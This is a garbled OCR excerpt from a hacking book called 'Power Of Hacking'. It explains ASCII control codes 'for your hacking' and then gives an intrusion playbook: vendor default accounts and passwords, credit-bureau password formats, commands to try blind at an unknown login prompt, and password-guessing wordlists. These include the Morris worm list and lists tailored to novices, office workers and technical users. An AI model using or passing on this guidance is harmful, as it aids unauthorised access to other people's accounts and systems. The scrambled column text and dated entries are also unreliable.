Explanation of Some ASCII Codes:ASCII character code tables are very popular in computer books. Hardly a computer book has been written that doesn't have a list of ASCII codes, even if ASCII has nothing whatsoever to do with the book. Since ASCII tables are so prevalent, I'm not including a full one here. However, I'm giving you something much more useful to use in your hacking endeavors: an explanation of the non-printing ASCII characters. It's just about impossible to find a listing anywhere that tells you what these things do or mean. Usually you just see the abbreviations listed - cryptic codes like "ENQ," "SI" and "DC1.` As you read through the list, try to think of ways you can use the information in your hacking. Mail:mtahirzahid@yahoo.com
Page 279
Power Of Hacking Remember, these codes may not be acknowledged by all remote computers, but often they will be valid, and can be strategically sent to make a computer think something is happening when in fact it is not. 0 NUL NULI No character - used for filling time in synchronous communication, or for filling in extra spaces on disk/tape when there is no data. 1 SOH Start Of Heading Indicates the start of a heading which contains addresses or routing information that applies to the text that follows the heading. (Control-A) 2 STX Start of TeXt Specifies the end of the heading, and the beginning of a block of text to which the heading applies. (ControlB) 3 ETX End of TeXt Indicates the end of the text that STX started. Often used as a break key. (ControlC) 4 EOT End Of Transmission A transmission may have included one or more "texts," each with a heading. Indicates the last 185 text has been sent. Often used under UNIX to indicate the end of input. (ControlD) 5 ENQ ENQuiry A request for a response from the other end. It can be used as a "Who are you?" request for a station to identify itself. Might also be used to ask if a message has been received. (Control-E) Mail:mtahirzahid@yahoo.com
Page 280
Power Of Hacking 6 ACK ACKnowledge Character transmitted by a receiving device as affirmative response to sender. (Says, "Yep. 1 got the message.") Used as a positive response to an ENQ. (ControlF) 7 BEL BELI Used when there is need to call personnel's attention; may control alarm or attention devices. (Control-G) 8 BS Back Space Indicates the movement of the printing mechanism or display cursor one position back. (Control-H) 9 HT Horizontal Tabulation Moves cursor or print mechanism to next preassigned "tab" or stopping position. Often the same as pressing the Tab key. (Control-1) 10 LF Line Feed Move printing mechanism or display cursor to start of next line. (Control-J) 11VT Vertical Tabulation Print mechanism or display cursor to next series of preassigned printing lines. (Control-K) 12 FF Form Feed Moves printing mechanism or cursor to starting position of next page, screen or form. Often clears the display screen. (Control-L) 13 CR Carriage Return Moves to starting position of same line. Often corresponds to the Enter or Return key, or Control-M. Mail:mtahirzahid@yahoo.com
Page 281
Power Of Hacking 14 SO Shift Out Indicates that the code combinations which follow should be interpreted outside standard character set until an SI is reached. (Control-N) 15 SI Shift In Indicates the code combinations which follow should be interpreted according to standard character set. Sometimes aborts output while allowing program to continue. (Control-0) 16 DLE Data-Link Escape Indicates the following character is a control code rather than data. (Control-P) 17 DC1 18 DC2 19 DC3 20 DC4 Device Controls Characters for the control of ancillary devices or special terminal features. DC3 (Control-S) usually pauses local reception of output until a DC1 (Control-Q) is given. DC2 is Control-R. DC4 is Control-T. 21 NAK Negative AcKnowledgment Character transmitted by a receiving device as a negative response to an ENQ. A NAK says, "What'd ya say? I didn't quite catch it." (Control-U) 22 SYN SYNchronouslidle Used in synchronous transmission systems to achieve synchronization. When no data is being sent, synchronous transmission system may send SYN characters continuously. (Control-V) 23 ETB End of Transmission Block Indicates the end of a data block for communication purposes. Used for blocking data where block structure is not Mail:mtahirzahid@yahoo.com
Page 282
Power Of Hacking necessarily related to processing format. (Control-W) 24 CAN CANcel Data preceding it in a message or block should be disregarded, usually because an error has been detected. Sometimes used as an "abort transmission" command. (Control-X) 186 25 EM End of Medium Indicates physical end of a disk, tape or other medium, or end of required or used portion of that storage medium. (Control-Y) 26 SUB SUBstitute Substituted for character found to be erroneous or invalid. Sometimes used as a break command. (Control Z) 27 ESC ESCape Character intended to provide code extension by giving alternate (usually control) meaning to characters that follow. 28 FS File Separator 29 GS Group Separator 30 RS Record Separator 31 US Unit Separator Information separators may be used in an optional manner except that their hierarchy is FS (most inclusive) to US (least inclusive). 32 SP SPacebar 127 DEL DELete Common Defaults Mail:mtahirzahid@yahoo.com
Page 283
Power Of Hacking These are words that are often used as default names and passwords. Try using various combinations of them as both name and password, then one as name and a different one as password, etc. Besides these, try using variations on the company name and the type of service it offers as names and/or passwords. Try things like putting a slash in front of words (such as '7guest"), or separating two words with a slash, as in "MAIL/company name." Also try putting spaces in the words (i.e., "New user") and varying capitalization (i.e., "NewUser," "newUser," etc.). Also worth trying are easily remembered numbers (1000, 99999, 12345, 101010, etc.), and repeated letters - if a password can be up to eight characters, try "XXXXXXXX," and other things like it. Don't forget single letters and digits, asterisks and other above-nurnber characters, and plain 'n simple blank line Returns. guest start accoun supruser visitor Su default superuser visit 0 a anonymous intro email x user demo use q demonstration mail enter Z instructions new newuser sysop introduction manager 1 password name test Sys system systest field temp instr passwd pswrd 9 startup id tty root go train trainer tempy training info Mail:mtahirzahid@yahoo.com
Page 284
Power Of Hacking testing mini hello techsupport Now here is a whole slew of defaults, common passwords and account names for different operating systems and other kinds of computers. Most are probably out of date or otherwise inoperable, but it gives you an idea of what is expected in these environments. Credit Bureaus TRW uses a password of the form: "LLLNNNNNNNLNL" ( Example - abc123456d7e) where L is a letter of the alphabet, and N is a digit. Note that the actual password does not have spaces between each letter and number. 189 For CBI, the passwords are: "NNNLLNNN-??" Again, the Ns are numbers and the Ls are letters. A question mark refers to any character. Note the hyphen placed between the last digit and the first wild character. DEC-10 UIC Passwords: (User Identification Code): 1,2 syslib, operator, manager 2,7 maintain 5,30 games FTP Accounts: anonymous, guest, visitor Mail:mtahirzahid@yahoo.com
Page 285
Power Of Hacking Password: Carriage Return HP-X000 (MPS OS) Login using "Hello [job IDI,[Username][User Passwordl.[Account Namel,[Group Name][GroupPassword]" Accounts: Mgr.Telesup,hp3 Mgr.Telesup,hponly Mgr.Telesup,pub Mgr.Hpoffice,pub Mgr.Rje,Pub Manager.itf3000,pub Field.support,pub (password: f1d, field) Mail.telesup,pub (password: mail) Mgr.rje Field.hppl87 Field.hpp189 Field.hpp196 Field.support,pub Hpoffice,pub IRIS Account names or passwords: manager, boss, software, demo, PDP8, PDP11, accounting Libraries Account names or passwords: library, syslib, lib, circ, cat, bib, biblio, catalog, file, minicirc NOS Accounts: $system, systemv Mail:mtahirzahid@yahoo.com
Page 286
Power Of Hacking PRIMOS Account names: admin, guest, prime, primenet, test, system, lib, dos Passwords: system, sysman, netlink, primenet, manager, operator, prime, primos, primos-cs, test, guest UNIX Accounts or passwords: root, admin, sysadmin, Unix, UUCP, rje, guest, demo, daemon, sysbin, who, whois, time, date, ftp, anonymous VM/CMS Accounts or passwords: autologl, autolog, cms, cinsbatch, erep, maintain, maint, operatns, operator, rscs, smart, sna, vrntest, vrnutil, vtam, dial VMS Accounts or passwords: system, guest, default, operator, manager, syslib, uetp, sysmaint, service, digital, field, service, guest, demo, deenet, dec What would you do if you dialed a number, got connected, and saw nothing but this: # on the screen? Out of security interests, many systems will not identify themselves or offer any text at all except a cursor and possibly a strange prompt. This is called "security through obscurity." In these frustrating instances you will have to try typing in every possible command you can think of until something works. This is a list of all the commands I remember being able to use in this sort of situation. Besides these words, if the system gives you any information at all, like company initials or weird words, try feeding back to it what it says to you. Sometimes commands must be preceded by a control character. For example, instead of typing "login," one types "/login." Unless the system specifically asks for something (like a log-on ID in a particular Mail:mtahirzahid@yahoo.com
Page 287
Power Of Hacking format) it's a good idea to try these commands, because you never know when one of them will work. date list log man connect public page time load trace dir info open net login call begin sys a go h logon 1i show q state phone(s) help link mail print x control tele ? buy show @ bye email shell menu sell hint quit demo access demo start intro exit end run shed who whois on games calendar Novice Word List This is a list of words that turn up frequently as passwords. Using one of these as a Mail:mtahirzahid@yahoo.com
Page 288
Power Of Hacking password usually indicates a novice or disinterested computer user. In other words, if you happen to know a certain user is new to computing, either due to postings on a bulletin board, age, or whatever, then these are the words you would want to try. In addition to these words, you will want to try the letters of the alphabet, various combinations of letters, and numbers, and things easily typed on a standard keyboard, such as "poiuy" and "yhnujm". Also for novices, try names and team names, cars, colors, animals, job-related words, pet names, music groups, local popular radio station call letters, local slang, names of cities or towns, company names, and names or type of computer. It For parents, try things like "dad," "daddy," mother," or "mommy." For people of certain occupations, something like "Dr. Daddy" may be more appropriate. Two lists of words are given. The first is my own. The second, written by Robert Morris Jr., was used by the worm program that blazed throu the Internet in 1988. Many of the words he used seem oddly chosen and superfluous, and there are many others which I can't understand why he did not include. I have it listed here mostly for historical reasons. I also think it's interesting to see how another hacker handles a situation. Duplications between the lists have been removed from my list. My List: account birthday disk adventure black diskette aid blue dollar aids book/s dumb alpha bowling earth angel brain eat Mail:mtahirzahid@yahoo.com
Page 289
Power Of Hacking ass breast fish asshole car/s force bach Christmas Friday bard code fuck barf comp fucku baseball cow fuckyou basic crazy games basketball cunt go bboard darkstar god bbs dead golf beam death ham beta dick happy big disc hell 193 hi nazi strike atmosphere clusters establish hitler no striker aztecs coffee estate hockey o.k. stupid azure coke euclid home okay suck bacchus collins evelyn. hope open sun bailey commrades extension horses oreo sunshine banana computer fairway hump overload superbowl bandit condo felicia Mail:mtahirzahid@yahoo.com
Page 290
Power Of Hacking id pass superman banks cookie fender ident penis system barber cooper fermat identify Pepsi talk baritone cornelius fidelity identity play television bass couscous finite in please tennis bassoon creation fishers intro print terminal batman creosote flakes keyboard printer test beater cretin float kill pswd tester beauty daemon flower king qwerty thanks beethoven dancer flowe kiss radar thunder beloved daniel foolproof later radio thunderbolt benz danny football life real tiger beowulf dave foresight lion red tincan berkeley december format little rex tits berliner defoe forsythe login run tv beryl deluge fourier logon Saturday tyger beverly desperate fred love sex universe bicameral develop friend manager shit user bob dieter frighten marijuana skull vagina brenda digital fun me smart white brian. discovery fungible mensa snoopy who bridget disney gabriel Mail:mtahirzahid@yahoo.com
Page 291
Power Of Hacking Mickey soccer word broadway dog gardner mine space world bumbling drought garfield modem spacebar yes burgess duncan fauss Monday starlight you campanile eager george money stars zoo cantor easier gertrude moon start cardinal edges ginger mouse startup carmen edinburgh glacier music stop carolina edwin gnu caroline edwina golpher cascades egghead gorgeous Morris List: castle eiderdown gorges cat eileen gosling aaa algebra answer cayuga einstein gouge aaa algebra answer celtics elephant graham academia aliases anthropoge cerulean elizabeth gryphon aerobics alphabet anvils change ellen guest airplane ama anything charles emerald guitar Mail:mtahirzahid@yahoo.com
Page 292
Power Of Hacking albany amorphous aria charming engine gumption albatross analog ariadne charon engineer guntis albert anchor arrow chester enterpise hacker alex andromache arthur cigar enzyme hamlet alexander animals athena classic ersatz handily 194 happening lynne Patricia Sal target harmony macintosh Peoria Saxon tarragon harold mack penguin scamper taylor harvey maggot persona scheme telephone hebrides malcolm percolate Scott temptation heinlein mark persimmon scotty thailand hello markus Pete secret tiger Mail:mtahirzahid@yahoo.com
Page 293
Power Of Hacking help marty peter sensor toggle herbert marvin phoenix serenity tomato hibernia master Philip sharks topography honey maurice Pierre Sharon tortoise horus mellon pizza Sheffield toyota hutchins merlin plover Sheldon trails imbroglio mets Plymouth Shiva trivial imperial michael polynomial shivers trombone include michelle pondering shuttle tubas ingres mike pork signature tuttle inna minimum poster Simon umesh innocuous minsky praise simple unhappy irishman moguls precious singer unicorn isis moose prelude single unknown japan morley prince smile urchin jessica mozart Princeton smiles utility Mail:mtahirzahid@yahoo.com
Page 294
Power Of Hacking jester nancy Protect smooch vacant jixian napoleon protozoa smother vertigo johnny nepenthe pumpkin snatch vicky joseph ness puneet snoopy village joshua network puppet soap virginia judith newton rabbit Socrates warren juggle next rachmaninoff sossina weenie julia nic rainbox sparrows whatnot kathleen noxious raindrop spit whiting kermit nutrition raleigh spring Whitney kernel nyquist random springer will kirkland oceanography rascal squires William knight ocelot really strangle Williamsburg ladle Olivetti rebecca Stratford Willie lambda Olivia remote Stuttgart Winston lamination oracle rick subway Wisconsin larkin orca ripple success wizard larry Orwell robotics Mail:mtahirzahid@yahoo.com
Page 295
Power Of Hacking summer wombat lazarus Osiris rochester super woodwind lebesgue outlaw rolex Superstage wormwood lee oxford romano support yaco leland pacific ronald supported yang leroy painless rosebud surfer yellowstone lewis Pakistan rosemary Suzanne yosemite light Pam roses swearer zap lisa papers ruben symmetry zimmerman louis password rules tangerine 195 BLANK PAGE 196 APPENDIX E: Job - Related Word List These are passwords that might come up in a secretarial or office clerk setting. If the system you're attempting to get into is an office, it's a good idea to try these words before the novice list. For office settings, also try the company name and variations (initials, Mail:mtahirzahid@yahoo.com
Page 296
Power Of Hacking abbreviations), titles of software programs they might use there, and words related to that particular job. spread memo info work spreadsheet/s wp comp job office word file doc paper/s file/s busy notes report/s sheet/s type document/s txt text enter dbase printer database print journal process desk desktop data write folders secretary computer term terminal news processor letter/s mail mailing business docs read stuff project labor public week day phone/s lotus 123 disk disc level service admin PC net network protect safe boss software IBM Friday accounting Monday book/s writer begin secretery Mail:mtahirzahid@yahoo.com
Page 297
Power Of Hacking margin list field record check sec pres manage table clock Technical Word List Most people who use computers are just casual users, but then there are the powerusers- people like you - who know what they're doing and love doing it. These sorts of people are also often fond of ham radio, science fiction and fantasy, electronics, mathematics, chess, programming, and other related things. This list is comprised of words taken from some of these categories. Also try words from the Glossary. You'll notice that a lot of Star Trek words have been included here, as Star Trek is big among computer users. abort ambassador atheist abortion anarchism attack absolut anarchy avatar absolute analog baggins access application band address arc bandwidth ai archive bang algorithm ascii barf alias async baud alpha atheism bbaggins bboard chomp erotics beam Christmas expert beamup cluster external berserk/er connect female biff cowboy foobar Mail:mtahirzahid@yahoo.com
Page 298
Power Of Hacking Bilbo crack/er fractal Blast crunchy freq Board crusher frequency Bogon data frodo Bomb date fronteir Bones dbms frontier Bridge demigod function Broadcast demo gene Buzz devil generation Cable Diana genius cage digital go captain dipole god central director green chang dos grep channel dump grok chaos dvorak gronk chen ebdic group chess enterprise hack/er chief enterprize ham choke erotica hamradio hobbit oscillator szone home output tasha horizontal overheat tech host overload technical hotkey picard technician Mail:mtahirzahid@yahoo.com
Page 299
Power Of Hacking human piggy test index power time input pres tng iris primos transport isis procedure transporter j1p prodigy travel kermit protocol trek king quartz treker kirk quattro, trekie klingon query trekker Ian quit trekkie lang qwerty trekky language radio tribble/s laser random troy lee ravel tsupport lord register tyar male riker unix man robot var mark romulan variable mask romulon vax master romulun vector matrix rtty virus memory ryker VMS mensa scotty Vulcan menu scraft wan Mail:mtahirzahid@yahoo.com
Page 300
Power Of Hacking modal shuttle Wang mode shuttlecraft warf model skip warp modem skipzone WC modulate space wheel moon speed wizard msdos spock worf nc-101 star worm net.god stars xmodem. network startrek xterm next sting ymodem, nil strek zmodem nill sttng yar nim Su zero node sundevil zoo null super object superuser ohm support OOP SWI operation synch
Mail:mtahirzahid@yahoo.com
Page 301